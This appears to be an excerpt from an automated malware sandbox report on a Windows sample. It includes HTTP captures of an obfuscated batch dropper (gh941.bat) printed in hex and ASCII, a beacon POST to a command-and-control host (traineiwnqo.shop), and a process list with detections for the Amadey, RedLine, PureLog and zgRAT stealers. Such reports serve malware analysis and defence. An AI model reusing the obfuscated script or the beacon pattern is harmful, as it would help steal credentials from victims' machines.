2024-08-31 13:45:06 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:45:06 GMT Content-Type: text/x-msdos-batch; charset=UTF-8 Content-Length: 4812845 Connection: close Content-Disposition: inline; filename=gh941.bat Cache-Control: no-cache, private Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRHVWlpYjRBU29ZS1prUFJnUHQzNmc9PSIsInZhbHVlIjoiK2ZBM0hvMXhNZTJISnFJcTRnb1A1V25HNFdNR1J3MnZkSFd4WUJKS1YydmVFdGd3bW9iZ3hnTHN5ckdNMnMzeTBScTBmdlgrdi9mQWlKazdESzMreTg1OFdqOStFeTBiNGhyUHNOMXpYRVV5NlcvYlI5TjZkdmwrL0pOREhrSkEiLCJtYWMiOiI3NGQ1Y2Q5MDc3ZTk2NDMzNTY2MmQ4NWZiOTFkY2JlOTZlNjUxMmIwM2FlMWFmMmE1ZWU1ZDk0NzA2ZmUxMDQ4In0%3D; expires=Sat, 31-Aug-2024 15:45:06 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6Im1VYkVCejJ1Z0ZxNVcxYjRUYjlxdFE9PSIsInZhbHVlIjoiUnNqb0Z2bktCUjlzeGpkdHBFK2JFTmRFdklwUEdxZmJPNjA2cDRaa1pkTlV6ZDJVOFdKOGFMTmVLbitlZTFLcVRYT2xsTE91ZjV3WWYxN2MxV2ZvclBFTHRZODlOaTI3Ny9xcEVMVDJEcVMvTXBqQUEwUDVVT0tIaXFncFNFU3oiLCJtYWMiOiIzZDhjYTc5ZDQwZWU1MjhlMzEwZWExZmUwYWQwNWY2Y2NiZGFlMzZkOTMwZTViMDczZjc3OTc5Y2JiZjc4MjllIn0%3D; expires=Sat, 31-Aug-2024 15:45:06 GMT; Max-Age=7200; path=/; httponly; samesite=lax CF-Cache-Status: DYNAMIC
2024-08-31 13:45:06 UTC	409	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 58 58 6a 77 6c 4b 63 41 6d 38 25 32 46 4e 6b 66 34 62 42 48 77 46 51 25 32 42 63 45 4d 4a 5a 51 51 4a 53 74 46 76 25 32 42 49 62 62 4e 56 6e 67 52 44 35 58 48 77 68 4f 43 62 42 30 5a 58 4d 6b 63 53 79 30 72 63 71 75 49 37 75 55 6f 32 62 47 41 4e 75 4d 71 6a 79 66 76 66 25 32 42 52 6b 77 75 70 43 55 33 71 79 66 77 46 48 25 32 46 6f 4b 30 6f 38 25 32 42 5a 31 7a 4c 74 41 47 45 66 67 6d 43 4a 59 6b 43 44 75 58 53 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXjwlKcAm8%2FNkf4bBHwFQ%2BcEMJZQQJStFv%2BIbbNVngRD5XHwhOCbB0ZXMkcSy0rcquI7uUo2bGANuMqjyfvf%2BRkwupCU3qyfwFH%2FoK0o8%2BZ1zLtAGEfgmCJYkCDuXSQ%3D"}],"group":"cf-nel","max_age":6048
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 25 5e 25 40 25 42 64 43 42 78 43 4d 48 70 41 71 4f 78 70 48 57 7a 55 62 4d 4e 6c 69 73 59 4a 5a 45 43 52 5a 4c 68 45 4f 42 4c 68 71 64 51 4f 52 55 53 58 6e 4f 4a 70 79 4b 57 79 76 71 55 6a 43 4f 44 69 66 79 41 45 47 54 41 67 6b 72 45 58 56 59 74 6f 7a 61 76 6c 56 6d 73 70 4f 4a 69 79 47 42 45 42 41 49 4a 73 74 6f 72 75 6e 44 65 67 66 5a 43 78 57 46 4b 43 73 73 6e 53 67 6c 50 58 4b 63 7a 4a 4d 63 77 6e 70 61 55 6c 4a 62 58 73 68 6c 25 25 5e 25 65 25 4f 67 4c 42 62 52 63 6a 69 76 51 6d 68 79 74 4a 6b 65 76 75 63 44 70 69 56 4b 7a 53 71 75 56 4c 55 62 61 51 5a 42 78 52 4a 54 6e 52 79 4f 4e 4d 70 72 4d 6e 4c 52 68 6c 52 43 46 71 73 6a 53 4f 41 66 73 66 79 44 4b 4a 47 44 4b 6a 71 78 4a 68 58 4d 44 5a 48 48 5a 63 55 50 5a 77 56 Data Ascii: @echo off%^%@%BdCBxCMHpAqOxpHWzUbMNlisYJZECRZLhEOBLhqdQORUSXnOJpyKWyvqUjCODifyAEGTAgkrEXVYtozavlVmspOJiyGBEBAIJstorunDegfZCxWFKCssnSglPXKczJMcwnpaUlJbXshl%%^%e%OgLBbRcjivQmhytJkevucDpiVKzSquVLUbaQZBxRJTnRyONMprMnLRhlRCFqsjSOAfsfyDKJGDKjqxJhXMDZHHZcUPZwV
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 6b 7a 71 4b 62 7a 6c 75 50 6c 73 4c 76 6e 47 4b 74 78 51 76 5a 52 53 52 76 7a 55 41 65 45 62 46 64 6e 4b 58 42 42 58 4d 56 61 50 63 6f 73 65 70 6d 42 59 43 46 55 53 74 48 7a 70 43 46 4c 70 6c 6a 4e 49 69 43 25 25 5e 25 66 25 6a 53 7a 65 41 59 62 50 43 63 75 45 6e 44 46 7a 5a 6a 75 72 71 63 6d 76 67 6a 4b 45 54 42 4b 57 4d 44 72 67 64 42 74 54 72 52 57 6d 68 61 79 4d 47 4b 4e 79 4e 6b 73 68 47 64 58 72 6e 77 57 62 73 79 52 4a 6c 79 77 79 50 41 61 79 67 61 6f 67 4c 59 59 69 4e 6c 6a 43 6c 6a 41 5a 44 63 47 55 55 55 54 4a 69 4f 41 68 6e 70 4a 6d 6b 55 62 47 50 51 46 6f 79 4e 6f 67 70 70 79 62 59 78 55 4d 55 66 45 6c 67 46 58 57 79 51 56 79 43 57 73 72 69 55 6a 4d 77 72 76 67 47 4e 75 54 71 79 6a 51 75 57 72 65 70 50 7a 6b 54 49 51 49 53 50 44 73 57 68 54 65 Data Ascii: kzqKbzluPlsLvnGKtxQvZRSRvzUAeEbFdnKXBBXMVaPcosepmBYCFUStHzpCFLpljNIiC%%^%f%jSzeAYbPCcuEnDFzZjurqcmvgjKETBKWMDrgdBtTrRWmhayMGKNyNkshGdXrnwWbsyRJlywyPAaygaogLYYiNljCljAZDcGUUUTJiOAhnpJmkUbGPQFoyNogppybYxUMUfElgFXWyQVyCWsriUjMwrvgGNuTqyjQuWrepPzkTIQISPDsWhTe
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 49 4f 71 66 4e 4d 64 71 6b 52 4f 6c 4f 54 5a 56 46 44 47 4e 6c 4d 41 74 71 64 56 43 73 63 77 6b 47 6c 4a 49 59 4a 76 4e 45 47 55 46 4b 51 4b 53 6f 6a 59 61 51 58 4f 56 6e 58 4f 4b 52 41 58 69 75 45 45 44 6a 71 57 56 69 53 69 45 53 56 4a 41 74 63 6f 69 64 77 74 49 77 4e 75 62 55 4c 57 64 4a 4c 6b 66 6c 67 49 59 6e 63 53 59 50 6b 64 73 6f 6f 71 4f 6d 50 65 59 6c 57 68 76 56 55 61 77 56 65 56 67 4b 44 6f 6e 75 70 56 61 44 76 54 6d 4b 62 4e 47 76 69 52 55 47 6d 55 70 59 6d 63 73 63 77 63 4c 6f 57 49 4b 61 64 74 57 54 65 75 50 64 56 4c 25 25 5e 25 6c 25 68 75 61 4e 6e 62 7a 79 4a 5a 6f 68 6e 43 59 68 74 68 58 4f 74 63 46 72 50 55 61 43 52 65 6c 64 42 69 6c 48 76 6f 79 6d 77 6b 62 61 50 6c 4a 72 67 6e 77 56 59 57 41 65 4f 4a 59 73 62 58 47 45 4e 6c 47 66 72 72 Data Ascii: IOqfNMdqkROlOTZVFDGNlMAtqdVCscwkGlJIYJvNEGUFKQKSojYaQXOVnXOKRAXiuEEDjqWViSiESVJAtcoidwtIwNubULWdJLkflgIYncSYPkdsooqOmPeYlWhvVUawVeVgKDonupVaDvTmKbNGviRUGmUpYmcscwcLoWIKadtWTeuPdVL%%^%l%huaNnbzyJZohnCYhthXOtcFrPUaCReldBilHvoymwkbaPlJrgnwVYWAeOJYsbXGENlGfrr
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 4f 67 47 65 6f 63 45 4d 4a 54 52 52 54 4b 67 47 56 49 4e 69 51 4d 76 58 51 5a 43 69 52 57 6f 67 6d 51 76 42 6e 79 52 50 4c 71 44 71 64 69 6a 56 42 52 73 69 77 6a 6c 63 4b 4a 6e 6f 41 76 55 4e 46 4c 46 64 6f 46 74 77 51 58 77 7a 69 65 55 49 51 47 47 61 44 66 4b 64 45 74 52 45 6b 43 70 70 77 51 4c 72 25 25 5e 25 65 25 66 48 57 79 57 72 79 4d 4d 54 46 4f 46 79 55 4f 55 6a 7a 62 43 79 56 4e 4f 6c 6e 49 68 64 73 74 43 65 4b 5a 4b 43 48 4e 6c 72 53 7a 6c 50 46 65 76 41 42 47 6c 71 62 47 4c 69 4a 4b 65 51 45 4a 41 6d 6d 41 4e 56 65 73 43 4d 51 6c 47 76 43 5a 47 6a 6d 47 42 4d 68 6c 64 64 6e 42 53 57 4a 75 4d 69 5a 5a 43 66 71 41 77 6a 65 7a 41 50 61 70 47 4a 65 55 45 59 69 4f 65 62 77 4a 48 44 7a 46 63 76 79 79 77 44 78 41 54 4d 6b 73 49 49 4b 6f 64 59 55 69 53 Data Ascii: OgGeocEMJTRRTKgGVINiQMvXQZCiRWogmQvBnyRPLqDqdijVBRsiwjlcKJnoAvUNFLFdoFtwQXwzieUIQGGaDfKdEtREkCppwQLr%%^%e%fHWyWryMMTFOFyUOUjzbCyVNOlnIhdstCeKZKCHNlrSzlPFevABGlqbGLiJKeQEJAmmANVesCMQlGvCZGjmGBMhlddnBSWJuMiZZCfqAwjezAPapGJeUEYiOebwJHDzFcvyywDxATMksIIKodYUiS
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 78 69 46 78 6d 68 43 51 25 25 5e 25 64 25 57 48 55 4c 79 59 67 50 63 63 53 47 6c 67 74 57 46 44 55 72 59 71 62 4f 61 4c 72 63 45 6e 43 79 75 6a 6a 48 66 6b 7a 46 45 6e 79 70 6c 47 6d 62 6c 41 47 44 49 7a 50 46 46 66 4c 4e 48 64 6c 50 7a 75 6d 62 58 4d 51 76 65 6f 4d 4b 52 4d 44 75 7a 70 51 64 48 5a 50 56 75 44 63 61 7a 4d 58 42 63 4a 50 52 74 6b 64 7a 4b 6b 7a 74 4d 65 4e 54 43 72 6e 72 6d 69 68 41 45 71 47 74 4b 51 57 72 72 6b 49 69 57 4c 61 6f 6d 72 73 77 7a 76 69 71 50 69 78 69 79 46 6f 54 43 70 6d 63 44 4b 50 55 6f 68 63 43 76 46 58 51 71 5a 66 56 50 4c 61 6a 69 71 44 42 73 4e 54 4c 57 50 47 47 79 58 4b 42 43 25 25 5e 25 65 25 68 73 73 47 55 6b 6c 48 52 7a 41 74 64 52 6f 64 55 6e 67 6e 42 41 6f 72 46 47 5a 71 73 74 6f 44 74 71 44 49 51 43 76 74 71 4c Data Ascii: xiFxmhCQ%%^%d%WHULyYgPccSGlgtWFDUrYqbOaLrcEnCyujjHfkzFEnyplGmblAGDIzPFFfLNHdlPzumbXMQveoMKRMDuzpQdHZPVuDcazMXBcJPRtkdzKkztMeNTCrnrmihAEqGtKQWrrkIiWLaomrswzviqPixiyFoTCpmcDKPUohcCvFXQqZfVPLajiqDBsNTLWPGGyXKBC%%^%e%hssGUklHRzAtdRodUngnBAorFGZqstoDtqDIQCvtqL
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 76 67 6d 4d 48 55 52 46 77 73 6a 6d 61 67 78 77 5a 74 4c 5a 61 50 6c 54 42 4e 44 78 62 50 6c 52 5a 74 25 25 5e 25 6f 25 4e 6e 46 4c 4f 72 6f 64 41 66 79 53 72 69 4f 42 64 43 4e 47 47 55 73 6c 54 71 75 44 47 68 72 6e 48 65 4a 6a 75 49 57 49 4c 4c 4b 4f 64 55 6d 6f 6d 6f 68 70 6c 4d 76 54 55 74 52 79 57 4b 78 74 4e 6c 6c 6e 7a 46 68 76 47 65 55 55 6a 45 68 5a 65 67 71 72 61 63 62 55 49 51 6f 61 51 78 4d 62 6e 72 61 53 49 59 50 48 67 4c 4a 68 52 41 4a 71 6d 53 74 51 74 66 74 4c 6b 72 46 49 71 68 45 69 25 25 5e 25 6e 25 54 48 53 44 70 71 66 72 4a 6c 6f 73 54 63 68 68 59 4e 59 64 56 48 69 59 70 49 72 74 67 71 5a 68 41 50 59 54 52 4d 57 43 6f 7a 4b 55 66 73 71 6f 78 41 72 74 47 65 77 6c 79 54 6f 48 59 4d 6b 73 6c 68 53 65 65 6f 71 6d 52 76 50 77 58 6e 54 57 72 Data Ascii: vgmMHURFwsjmagxwZtLZaPlTBNDxbPlRZt%%^%o%NnFLOrodAfySriOBdCNGGUslTquDGhrnHeJjuIWILLKOdUmomohplMvTUtRyWKxtNllnzFhvGeUUjEhZegqracbUIQoaQxMbnraSIYPHgLJhRAJqmStQtftLkrFIqhEi%%^%n%THSDpqfrJlosTchhYNYdVHiYpIrtgqZhAPYTRMWCozKUfsqoxArtGewlyToHYMkslhSeeoqmRvPwXnTWr
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 4c 50 4a 44 6c 4c 6e 46 79 74 76 41 61 25 25 5e 25 48 25 76 6f 54 48 61 61 6e 70 75 4a 4d 4f 54 77 25 25 5e 25 41 25 63 65 64 57 42 4a 6e 54 79 48 46 25 25 5e 25 52 25 75 72 54 4e 4f 68 4b 76 48 77 65 49 53 25 25 5e 25 44 25 76 76 61 51 78 53 51 6f 77 70 25 25 5e 25 44 25 45 79 6b 68 76 76 61 76 6e 53 59 25 25 5e 25 49 25 56 58 47 69 62 4a 47 5a 76 65 77 6f 25 25 5e 25 53 25 54 48 6a 4e 57 66 56 44 77 6b 49 41 6e 6c 25 25 5e 25 4b 25 65 6e 46 6c 77 55 66 53 52 4a 25 25 5e 25 20 25 46 50 71 57 41 63 57 70 43 4e 51 48 72 25 25 5e 25 57 25 64 57 7a 4e 58 48 4e 78 46 55 68 7a 6c 25 25 5e 25 44 25 58 4e 4f 73 64 67 41 66 6e 7a 4b 47 45 59 25 25 5e 25 43 25 6d 6e 46 6e 79 74 59 47 66 54 62 62 68 25 25 5e 25 20 25 76 4f 61 52 65 72 4f 5a 79 45 6c 25 25 5e 25 57 Data Ascii: LPJDlLnFytvAa%%^%H%voTHaanpuJMOTw%%^%A%cedWBJnTyHF%%^%R%urTNOhKvHweIS%%^%D%vvaQxSQowp%%^%D%EykhvvavnSY%%^%I%VXGibJGZvewo%%^%S%THjNWfVDwkIAnl%%^%K%enFlwUfSRJ%%^% %FPqWAcWpCNQHr%%^%W%dWzNXHNxFUhzl%%^%D%XNOsdgAfnzKGEY%%^%C%mnFnytYGfTbbh%%^% %vOaRerOZyEl%%^%W
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 50 44 64 7a 25 25 5e 25 4d 25 51 43 47 57 63 6b 79 73 73 6a 66 5a 25 25 5e 25 6f 25 6d 67 54 49 68 54 51 66 59 70 75 56 6f 25 25 5e 25 64 25 58 55 55 53 48 79 63 45 4b 58 25 25 5e 25 65 25 78 67 79 6c 4b 73 69 6e 57 6b 44 25 25 5e 25 6c 25 67 77 6a 49 79 53 6e 6d 62 4f 25 25 5e 25 20 25 41 79 78 72 79 42 45 48 76 57 25 25 5e 25 7c 25 4a 4e 73 54 6f 58 6c 48 73 56 74 25 25 5e 25 20 25 4e 77 78 50 45 4d 78 4c 6e 4a 63 58 4e 25 25 5e 25 66 25 61 4b 4d 73 43 69 6e 4e 4d 77 71 25 25 5e 25 69 25 44 71 61 74 76 69 67 4f 4a 56 61 4c 25 25 5e 25 6e 25 56 59 6c 66 61 4b 75 67 62 57 25 25 5e 25 64 25 56 5a 74 6c 77 61 4a 62 7a 5a 69 67 25 25 5e 25 73 25 55 6e 55 51 5a 43 66 4a 61 73 48 6b 63 25 25 5e 25 74 25 4d 4c 56 79 43 75 79 78 77 4f 56 72 4a 25 25 5e 25 72 25 Data Ascii: PDdz%%^%M%QCGWckyssjfZ%%^%o%mgTIhTQfYpuVo%%^%d%XUUSHycEKX%%^%e%xgylKsinWkD%%^%l%gwjIySnmbO%%^% %AyxryBEHvW%%^%\|%JNsToXlHsVt%%^% %NwxPEMxLnJcXN%%^%f%aKMsCinNMwq%%^%i%DqatvigOJVaL%%^%n%VYlfaKugbW%%^%d%VZtlwaJbzZig%%^%s%UnUQZCfJasHkc%%^%t%MLVyCuyxwOVrJ%%^%r%
2024-08-31 13:45:06 UTC	1369	IN	Data Raw: 6c 49 4d 64 56 41 66 70 49 55 6c 25 25 5e 25 20 25 61 45 79 58 48 63 71 65 63 58 25 25 5e 25 49 25 4f 47 55 68 52 4d 6f 73 57 45 73 25 25 5e 25 43 25 49 4a 44 70 44 71 53 49 61 44 4d 73 25 25 5e 25 48 25 69 4c 57 76 76 41 71 6f 76 59 77 62 74 6e 25 25 5e 25 39 25 74 42 6f 46 48 69 50 6e 65 4d 4d 4e 25 25 5e 25 2c 25 6f 6c 6b 55 43 6c 49 62 73 58 25 25 5e 25 20 25 64 62 69 6e 4c 67 6f 6b 63 71 6f 7a 25 25 5e 25 32 25 67 4b 4e 74 79 53 4a 4a 4d 67 5a 25 25 5e 25 30 25 4e 42 79 69 45 41 62 45 4f 42 25 25 5e 25 30 25 5a 43 43 58 78 43 4c 54 61 4d 57 4e 52 25 25 5e 25 39 25 70 43 7a 6e 52 72 55 6a 64 58 46 51 25 25 5e 25 29 25 78 50 6d 55 41 45 65 4f 51 57 25 25 5e 25 22 25 6c 68 62 6e 59 77 52 4e 47 4b 70 58 42 71 25 25 5e 25 20 25 6b 4b 51 79 45 73 48 7a 6e Data Ascii: lIMdVAfpIUl%%^% %aEyXHcqecX%%^%I%OGUhRMosWEs%%^%C%IJDpDqSIaDMs%%^%H%iLWvvAqovYwbtn%%^%9%tBoFHiPneMMN%%^%,%olkUClIbsX%%^% %dbinLgokcqoz%%^%2%gKNtySJJMgZ%%^%0%NByiEAbEOB%%^%0%ZCCXxCLTaMWNR%%^%9%pCznRrUjdXFQ%%^%)%xPmUAEeOQW%%^%"%lhbnYwRNGKpXBq%%^% %kKQyEsHzn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49769	188.114.97.3	443	5716	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:45:08 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=t7pUnZYf_CD6rjqed8Ykqn7Ya4zHhmlOGYjWoXVVDhY-1725111903-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: traineiwnqo.shop
2024-08-31 13:45:08 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 6e 65 77 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--newnew&j=5c9b8674a630d9101b46733aa37f15ec
2024-08-31 13:45:09 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=va3j7mhovb2gkhm5hgmq8c6ma5; expires=Wed, 25 Dec 2024 07:31:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ubbWtYmebf4vdXoG%2B53zmSdqAwLt2V6vA2%2F%2F04M%2Bq7Bkkdqy72hQW6Ofkm52R0%2BJ1HuuJqhDl%2FpChoYoL9lu8OIKAXvGZVY06KYP26IaqXk6BS27cBez%2B%2Fob3afga9l2WSDc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd75977b3b1a07-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 13:45:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-31 13:45:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:43:02
Start date:	31/08/2024
Path:	C:\Users\user\Desktop\OmnqazpM3P.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OmnqazpM3P.exe"
Imagebase:	0x7b0000
File size:	1'904'128 bytes
MD5 hash:	51ABF67011F60975D76946357EE94A48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2083364986.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2123628862.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:43:05
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x170000
File size:	1'904'128 bytes
MD5 hash:	51ABF67011F60975D76946357EE94A48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2151587366.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2111336808.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:43:05
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x170000
File size:	1'904'128 bytes
MD5 hash:	51ABF67011F60975D76946357EE94A48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2162837342.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2122678951.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:44:00
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x170000
File size:	1'904'128 bytes
MD5 hash:	51ABF67011F60975D76946357EE94A48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2659803462.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:44:04
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"
Imagebase:	0xbd0000
File size:	322'048 bytes
MD5 hash:	6134586375C01F97F8777BAE1BF5ED98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2691967398.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 54%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:44:04
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:44:04
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x6a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2835698109.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:44:07
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"
Imagebase:	0x150000
File size:	1'104'936 bytes
MD5 hash:	8E74497AFF3B9D2DDB7E7F819DFC69BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:44:07
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:44:07
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe"
Imagebase:	0x1c0000
File size:	557'056 bytes
MD5 hash:	88367533C12315805C059E688E7CDFE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.2723547615.00000000001C2000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: ditekSHen
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:44:08
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
